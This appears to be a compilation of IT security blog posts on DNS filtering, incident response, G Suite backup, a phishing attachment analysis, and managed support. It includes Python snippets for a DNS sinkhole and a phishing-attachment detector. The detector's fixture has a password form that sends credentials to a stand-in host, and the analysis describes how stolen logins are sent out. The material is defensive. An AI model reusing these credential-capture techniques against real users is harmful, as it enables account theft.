How It Works: DNS Filtering

There are certain organizations, mainly Internet Service Providers, that purchase hardware and software solutions that sit between users and the Internet. DNS filters allow users to filter out certain domains without having to purchase any hardware. Most corporate offices have firewalls that help protect the network, but what happens when an employee is working from home, travelling, or is sitting in a coffee shop?

How Does It Work?

Domain Name System (DNS) is a service that allows easy to remember domain names to be associated with unique IP addresses – such as – rather than typing in very difficult to remember IPs like

Briefly, when a domain is purchased from a domain registrar and that domain is hosted, it is assigned a unique IP address that allows the site to be quickly located. When you attempt to access a certain website, a DNS query is performed. Your DNS server will search for the IP address of the domain, which will allow a connection to be made between your browser and the server where the website is hosted. Once the connection is complete, your browser will display the webpage.

DNS filtering is a technique of blocking access to certain websites, webpages, or IP addresses.

With DNS filtering in place, the DNS server will not simply return the website's address even if its IP exists; the request is checked first. Whenever a webpage or IP address is known to be malicious and blacklisted, or is judged potentially malicious by the web filter, DNS blocking occurs. So, instead of being connected to the website they are attempting to access, the user is redirected to a local IP address that displays a page explaining why the website cannot be accessed.

Since DNS filtering is low latency, there should be no delay in accessing websites that do not breach your organization’s security policies.
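As an added illustration (not code from the original article), here is a minimal DNS filter in Python: it decodes the queried name from a raw DNS query, checks the name and each of its parent domains against a blocklist, and either answers with a local sinkhole address for the block page or hands the query through unchanged. The blocklist entries, the 127.0.0.1 sinkhole address and the sample query are constructed assumptions.

```python
import struct

# Constructed blocklist (not from the article): an entry blocks the domain and every subdomain.
BLOCKLIST = {"malicious.example", "phish.example.net"}
SINKHOLE_IP = "127.0.0.1"  # local address serving the "why this site is blocked" page (assumed)


def is_blocked(qname, blocklist=BLOCKLIST):
    """True if qname itself or any parent domain appears on the blocklist."""
    labels = qname.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def parse_qname(packet, offset=12):
    """Decode the QNAME of the first question (question names are never compressed).
    Returns (name, offset just past the terminating zero label)."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_query(qname, txid=0x1234):
    """Construct a minimal DNS A query: 12-byte header (RD set), one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    name = b"".join(bytes([len(l)]) + l.encode("ascii") for l in qname.split(".")) + b"\x00"
    return header + name + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def filter_query(packet):
    """Return (qname, response). response is None when the query should be forwarded upstream,
    otherwise a complete sinkhole answer the filter can send back to the client."""
    qname, qend = parse_qname(packet)
    if not is_blocked(qname):
        return qname, None
    txid = struct.unpack("!H", packet[:2])[0]
    # Response header: QR=1, RD=1, RA=1, RCODE=0 (0x8180); 1 question, 1 answer
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = packet[12:qend + 4]  # original question incl. QTYPE/QCLASS
    # Answer: compression pointer to the name at offset 12, TYPE A, CLASS IN, TTL 60, 4-byte RDATA
    rdata = bytes(int(octet) for octet in SINKHOLE_IP.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + rdata
    return qname, header + question + answer


def answer_ip(response):
    """Extract the A record address from a sinkhole response (last four bytes)."""
    return ".".join(str(b) for b in response[-4:])


if __name__ == "__main__":
    for host in ("www.malicious.example", "good.example.com"):
        name, resp = filter_query(build_query(host))
        print(name, "->", answer_ip(resp) if resp else "forwarded upstream")
```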

How efficient is a DNS Filter?

Unfortunately, DNS filtering cannot block all malicious websites, because in order to do so, a website must be determined to be dangerous. If a hacker launches a new phishing website, there will always be a delay between when the page is created and the moment it is checked and added to a blacklist.

Can DNS Filtering Be Bypassed?

It can be. Proxy servers and anonymizer websites could be used to mask traffic and bypass the DNS filter unless the chosen solution also blocks access to these servers and websites. To block a proxy server you will need to know its IP address, which you can get from your web server's logs.

For most Internet users, a DNS filter will block any attempt to access forbidden or harmful website content.

Cybersecurity is much more complex, especially nowadays, so there is no single solution that will allow you to block 100% of malicious websites, but DNS filtering should certainly be part of your cybersecurity plan as it will block most malicious websites.

Why Are The First Few Hours After A Cyberattack The Most Important?

In case of a data breach, it’s crucial to limit its effects as soon as possible. Each delay increases the chances of evidence being lost and decreases the chances of a cybercriminal being caught. The longer it takes your staff to notice and react to a cyber-attack, the higher its severity.

Time is of the essence.

In case of a successful cyber-attack, what you do in the first few hours after the attack can either save or break your business.

Living in a state of perpetual concern can be beneficial to the security of your organization. Former Intel CEO Andrew Grove once stated that “only the paranoid survive”. So, knowing all you can about possible future attacks and your organization’s vulnerabilities will help you understand how you need to prepare.

Just imagine that a hacker has remotely attacked your organization with a trojan that allows him to easily extract business data. With network monitoring and modern security controls in place, this incident can be detected and mitigated before it causes too much damage. However, if your business lacks a proper incident response plan, or simply doesn’t have enough visibility into its network, hackers are able to irreparably compromise your business.

Left unchallenged, cyber criminals can steal as much data as they desire.

You need a comprehensive crisis response plan to cover as many scenarios as possible.

It is imperative to have security protocols in place for logging, documenting, and reviewing the incident. This includes information about the incident (time of occurrence, type), actions taken to mitigate it, compromised systems, etc. It should be crystal clear to anyone reviewing your documentation what happened and what your designated staff did in response.

You need a communication plan.

Communication during any crisis is paramount. Pre-approved messaging templates can be useful, allowing employees to share information about the incident without getting stuck on copywriting and approvals.

Also, you should implement a dedicated communications system which has no connection to your day-to-day business operations.

You need to prioritize.

Do I have a backup that hasn’t been destroyed? Which system do I need to rebuild first? How do I restore from a backup if my systems are compromised? Where are the encryption keys for that backup?

It is crucial for C-level executives to work closely with the IT department to highlight the priorities of what the business needs to stay operational. This could include a document management system, the email service, the financial system etc. Not all systems can have top priority in recovery.

Recover fast.

Once you identify a priority, it is important that all required staff focus on the restoration process one problem at a time.

For almost every system, there are several dependencies or other systems your team needs to rebuild first. For instance, dependencies for an email service could include several email servers, DNS servers, an Active Directory server, a desktop or mobile ActiveSync client that can connect to retrieve emails, and so on.

Reduce risk factors.

You need to know for sure why your systems went down. Not fully understanding the root cause may put your business in the same difficult situation a few moments later, as you reinstate systems back onto the network.

Layering security controls and mitigations in consecutive levels of protection will minimize the risk of a successful cyberattack, thus preventing critical data leaks.

Also, when it comes to risk, don’t forget about your employees. It’s not just the technology and business operations. Staff will be working hard, and you need them to be security aware more than ever before. Employee security training is crucial.

Bottom line.

Unfortunately, cybercriminals are difficult to identify and even more difficult to prosecute. While it’s certainly true that a quick response increases the chances of a successful criminal investigation, the chances that such an investigation will come to a dead end are even higher.

At the end of the day, the most important element of how quickly your business reacts and recovers after a cyberattack is your staff.

The above aside, the best thing you can do is to practice good security hygiene. Strong access controls and monitoring tools are mandatory.

For more information on how we can help your business prepare for, respond to, and recover from a disruptive cyberattack, please visit our IT security services page and feel free to contact us.

GSuite Back-Up and Recovery

There are users who believe Google Vault is THE solution for G Suite data backup and recovery, but is it?

Firstly, what is Google Vault?

Google Vault is a native GSuite application that allows organizations to archive data, implement retention rules, preserve users by placing legal holds, search the organization’s data using several search operators, review actions of Vault users through audit reports, and also export data for further processing.

Some Google administrators believe that Vault is a “good enough” solution to use for backup and restore, as well as eDiscovery and archiving. While Vault is indeed a good solution for data retention for legal needs, it doesn’t meet the primary criteria for backup and restore, data availability and business continuity. In fact, Google notes that:

“If you delete a user, all the data associated with the user’s account will be removed from Google.”

So, Vault wasn’t designed to perform rapid, granular restores because it’s not a backup solution by definition; however, it can potentially restore lost data in certain situations.

The most important aspect when distinguishing Google Vault from a genuine backup solution is that Google Vault’s main function is to archive and retain data so that it could be easily located in the future.

Intrinsically, backup solutions preserve data integrity by continuously producing a copy that can replace the primary data if it is compromised. Attempting to use Google Vault for backup purposes will ultimately prove unprofessional because it would be inefficient and unsatisfactory. In any business, data availability is key, so restoring from a backup should be performed as fast as possible.

Does G Suite backup automatically?

Google does back up your GSuite data in order to guarantee that it remains accessible, but only in accordance with their own internal backup and disaster recovery plans. These backups are not available to admins or end users and exist solely to safeguard Google’s products and services from disasters, accidents, etc. Therefore, Google doesn’t protect your business data from intentional or accidental user deletion, programmatic errors, malware, etc.

How long will Gmail keep your emails?

Gmail will retain all emails that reach the inbox indefinitely, as there is no stated policy of deleting them once they reach a certain age. Bottom line, emails can be kept forever unless they are deleted by the user.

Once an email has been deleted, it will reside in the trash folder for a period of 30 days in which a user may recover the email before it is deleted permanently. Similarly, email that is identified as Spam by Gmail will be automatically deleted after a 30-day interval.

Can someone recover permanently deleted emails from Gmail?

GSuite admins may be able to recover the emails in one of two ways:

  • Emails may be restored from the Admin console within 25 days of deletion. After the 25-day period, the data is removed forever.
  • Mailboxes (including deleted messages) from the past 30 days can be retrieved using the Email Audit API.

After 25-30 days, not even G Suite administrators can recover emails without a viable backup and recovery solution in place.

Get complete protection for your business

Having your GSuite fully backed up provides a multi-layered approach to security against ransomware, compliance needs such as HIPAA, and advanced recovery features.

Unfortunately, it’s a common misconception among SaaS/Cloud users that backups aren’t necessary for their data because it already exists in the cloud. As previously mentioned, native GSuite and Office 365 apps don’t protect business data against human error, phishing emails, malware, etc. Ransomware attacks, especially in the cloud, are on the rise, and we all know how popular phishing scams have become.

Therefore, you need a dedicated solution to further improve the security of your business data. One that includes:

  • automated backups (at least once a day) that capture point-in-time (PIT) snapshots of each user’s relevant app data, with the option to perform additional backups at any time.
  • unlimited storage space
  • detailed activity log with all administrator and user action records.

SaaS/Cloud providers protect your data from hardware failure, software failure, power outages and natural disasters while StratusPointIT can help protect business data from human error and malicious acts from internal or external sources. As a result, your GSuite data (Mail, Contacts, Calendar, and Drives) will be secure (data encryption both at rest and in transit), easily recoverable, and fully protected.

Microsoft Docs Login Form Phishing Scam: Overview

Phishing e-mail campaigns are used to steal sensitive data such as login information and usually their success depends on a user clicking a link which leads to a phishing website that looks like a regular login page. However, not all phishing campaigns use remote websites as we are about to see.

Scammers continue to surprise us with their methods.

Several email users across the country have recently reported receiving emails that looked like traditional payment-notification phishing, with a fairly usual text: “Good day, please find attached a copy of your payment notification.” The HTML attachment (invoice.html or payment.html) it carried turned out to be anything but usual: instead of linking out, it redirects the browser to a fake login page.

So, when opening the 930 kb file in a regular text editor, right after the first line – <!-- Internal Server Error --> – there are more than four thousand empty lines followed by a large block of obfuscated JavaScript code (more than 500k characters).

The next step is to load the file in a browser. After opening it in Firefox, it became obvious why the script was so large. Unlike most other HTML-based phishing attachments, this one didn’t depend on an external fake login page but carried the entire thing within its body.

Although the page was supposed to look like a Microsoft Docs page, the scammers provided a list of multiple valid e-mail providers, such as Gmail, Yahoo, AOL, Hotmail, Office365, etc., that one could use to “log in”.

The catch for such a scheme to work is to create a page that looks genuine and inspires trust for users to fill in their login information. From our observations, in this particular case, scammers did a pretty good job as the page under examination feels authentic.

[Screenshot: MS login page]

After the user supplies an e-mail and a password, the website appears to connect the session to the e-mail server, but actually it sends an HTTP GET request containing the login data specified by the user to a remote web server at hxxp://

[Screenshot: GET request]

Subsequently, an additional request for a phone number and a recovery e-mail is displayed to the user. When those fields are filled in as well and sent to the same domain as before, although this time using a POST request, the browser is redirected to a low-quality picture of the supposed invoice and right after that the page is redirected again, but this time to either a genuine Microsoft website or to the domain specified in the recovery e-mail supplied by the user.

Sending the user’s login information to a server and then redirecting the browser to a legitimate web page is normal behavior for a phishing page. However, in this case the phishing page not only steals the credentials but also transfers them over plain HTTP, without any encryption, to a remote location.

Besides that, what is unusual about this phishing is the fact that the entire phishing page was delivered as an attachment. We believe that this was intended to avoid email security filters and analytics on web proxies. Also, by generating the landing page locally, the attackers reduce the risk that their landing page will be discovered and removed, but whatever the reason was, their M.O. is quite ingenious.

This isn’t the first phishing scam with a similar “self-contained” website, but it was the first time we came across such a complex HTML phishing attachment that carried all the scripts and files in one package and didn’t depend on a remote server for anything other than collecting the stolen credentials.
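As an added defender-side example (not from the original post or the campaign analysed), this Python triage function scores an HTML attachment for the traits described above: a leading “Internal Server Error” comment, thousands of padding blank lines, a very large inline script, a password form, and a plain-HTTP submission target. The thresholds and weights are assumptions chosen for illustration, and the sample attachment is constructed, not the real file.

```python
import re

# Indicators drawn from the attachment described above. Thresholds and weights are
# assumed values for illustration, not a published detection rule.
LEADING_COMMENT = re.compile(rb"^\s*<!--\s*Internal Server Error\s*-->", re.IGNORECASE)
SCRIPT_BLOCK = re.compile(rb"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
PLAIN_HTTP_TARGET = re.compile(rb"(?:action|src|href)\s*=\s*['\"]?http://", re.IGNORECASE)
PASSWORD_FIELD = re.compile(rb"<input\b[^>]*type\s*=\s*['\"]?password", re.IGNORECASE)

WEIGHTS = {
    "error_comment_first_line": 1,  # decoy first line to fool a quick look in an editor
    "blank_line_padding": 2,        # thousands of empty lines push the payload out of view
    "large_inline_script": 2,       # the whole fake login page is carried in one script
    "password_form": 2,             # credential capture form present
    "plain_http_target": 2,         # submission target uses unencrypted HTTP
}
QUARANTINE_THRESHOLD = 5


def longest_blank_run(data):
    """Length of the longest run of consecutive empty (whitespace-only) lines."""
    run = longest = 0
    for line in data.split(b"\n"):
        run = run + 1 if line.strip() == b"" else 0
        longest = max(longest, run)
    return longest


def triage_html_attachment(data):
    """Return the indicators found in an HTML attachment plus a score and a verdict."""
    inline_script_bytes = sum(len(m.group(1)) for m in SCRIPT_BLOCK.finditer(data))
    findings = {
        "error_comment_first_line": LEADING_COMMENT.match(data) is not None,
        "blank_line_padding": longest_blank_run(data) >= 1000,
        "large_inline_script": inline_script_bytes >= 100_000,
        "password_form": PASSWORD_FIELD.search(data) is not None,
        "plain_http_target": PLAIN_HTTP_TARGET.search(data) is not None,
    }
    score = sum(WEIGHTS[name] for name, hit in findings.items() if hit)
    findings["score"] = score
    findings["verdict"] = "quarantine" if score >= QUARANTINE_THRESHOLD else "allow"
    return findings


def constructed_sample():
    """Constructed stand-in with the same shape as the described attachment (not the real file)."""
    padding = b"\n" * 4500
    script = b"<script>" + b"var _0x=[];" * 12000 + b"</script>"
    form = (b"<form action='http://collector.invalid/login' method='get'>"
            b"<input type='email' name='u'><input type='password' name='p'></form>")
    return b"<!-- Internal Server Error -->" + padding + b"<html><body>" + script + form + b"</body></html>"


if __name__ == "__main__":
    print(triage_html_attachment(constructed_sample()))
```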


At StratusPointIT, we support all our customers by offering them guidance, training and professional IT security features to prevent advanced cyber-attacks such as this one from compromising their systems.

Few Reasons Why 24×7 Network & Server Support Is Mandatory

Imagine what happens if your organization’s network or server(s) suddenly goes down one night. If you haven’t planned for it, there are two scenarios: either incredibly high overtime costs or solving the issue(s) during the workday.

Having 24×7 monitoring of your network and server(s) will ensure that your organization can keep working around-the-clock and that every IT issue is solved as it comes up, avoiding a destructive cascade of failures.

Procure an Instant, Experienced Support Team & Save Money

Rather than having to rely on one or two IT employees, a company with a managed IT service solution spanning network, server, and help desk support has immediate access to a qualified, experienced team. Its members will be able to quickly identify the source of the problem and resolve it in a timely manner, so that your organization doesn’t experience substantial business disruption.

A managed IT service solution will free up your IT staff, so that your IT department can focus on more important issues. That means you won’t be paying your IT team overtime; instead, you’ll be able to use their knowledge and experience to optimize the existing infrastructure and look for new technologies to improve business operations.

Businesses today cannot afford downtime

When their IT infrastructure gets hit, their internal workflow will stop, and organizations will be unable to deliver their products/services to their waiting clients, losing money and damaging their brand as a result. Some companies can suffer hits and overcome episodes like these; others can’t.

Technical problems may occur. Hardware/software issues are always a possibility. Of course, not every IT support issue can cause a disaster and not every issue is urgent, but how your IT Help Desk responds is crucial because it can make the difference between a little hiccup and a massive business interruption.

Here are two key reasons why 24×7 network and server support should never be optional.

24×7 Monitoring

People may stop working on nights or over weekends, but systems don’t. Your help desk should be teamed with 24×7 remote monitoring catching little IT issues before they become big ones, in many cases before you’re even aware there’s an issue.

With 24×7 monitoring, there’s a good chance that your help desk will already be aware of the problem you’re experiencing and is actively working to resolve it.

Urgent Issues

This may seem like a costly luxury, but it’s not. The team providing 24×7 monitoring can also provide 24×7 support in much the same way that grocery stores can stay open all night since employees are already there stocking shelves.

Of course, your team may not always be working nights and weekends, but when they are, it’s probably for an important reason. The last thing they need is to be blocked because they can’t get support.


24×7 Network and Server Support is not a luxury, but rather a requirement. A requirement that will avoid hassles and keep your team happy and productive.

Why Businesses Need to Create a Risk Profile to Prevent Cyberattacks

Think about the last time you were afraid of something. Did you approach the situation rationally? If so, you’re in the minority. Most people are terrible at being rational when afraid. And where cybersecurity is concerned, that’s exactly what criminals are counting on. 

In 2018, the Data Science Institute at Columbia found that surgeons under stress tend to make up to 66 percent more mistakes in the operating room. You’re probably wondering what, if anything, this has to do with cybersecurity. A great deal, actually.

It’s proof positive that even medical professionals are prone to error when under extreme stress. The cybersecurity industry is no different.

There’s no shortage of sensationalism around the cybercrime industry. You can’t even turn on the news without hearing about some new and terrible threat facing the digital world. To hear the media tell it, cybersecurity is an industry in a perpetual state of crisis.

A looming talent shortage and overworked employees. Irreducibly complex and sophisticated cyberattacks led by state-sponsored black hats. Unstoppable botnets that can bring the entire Internet to its knees. Powerful tools like ransomware-as-a-service that allow even the least tech-savvy of individuals to execute advanced attacks.

These are all things that are happening, true. And they’re extremely intimidating to think about. If a well-funded black hat organization were to set its sights on your business, there would be little you could do.

The thing is, devastating cyber-incidents like the ones we see so frequently online? They are not the norm. They’re just what makes headlines.

In actuality, the vast majority of cyber-attacks and data leaks are neither complicated nor targeted. They are shotgun cyberattacks that effectively throw malicious software and attack vectors at the wall to see what sticks. If you don’t want to take my word for it, have a look at the stats below.

What I’m trying to say is that too often, corporate cybersecurity veers to one of two extremes. Either we get sloppy because we think it can’t possibly happen to us, or we become paranoid, terrified at the dangers that exist on the web. Neither is the correct path.

Instead, businesses need to create and analyze their risk profile. They must endeavor to understand their unique organizational workflows, data requirements, and security threats. And perhaps more importantly, they must take a proactive role in both enabling employees and protecting corporate assets.

This is not something that can be done from a place of fear, stress, or paranoia. It needs to be careful, measured, and well planned. It needs to be an organization-wide, multi-departmental approach as well. That way, you don’t have a single group of people shouldering the burden for absolutely everyone.

About the Author:

Tim Mullahy is the Executive Vice President and Managing Director at Liberty Center One, a new breed of data center located in Royal Oak, MI. Tim has a demonstrated history of working in the information technology and services industry.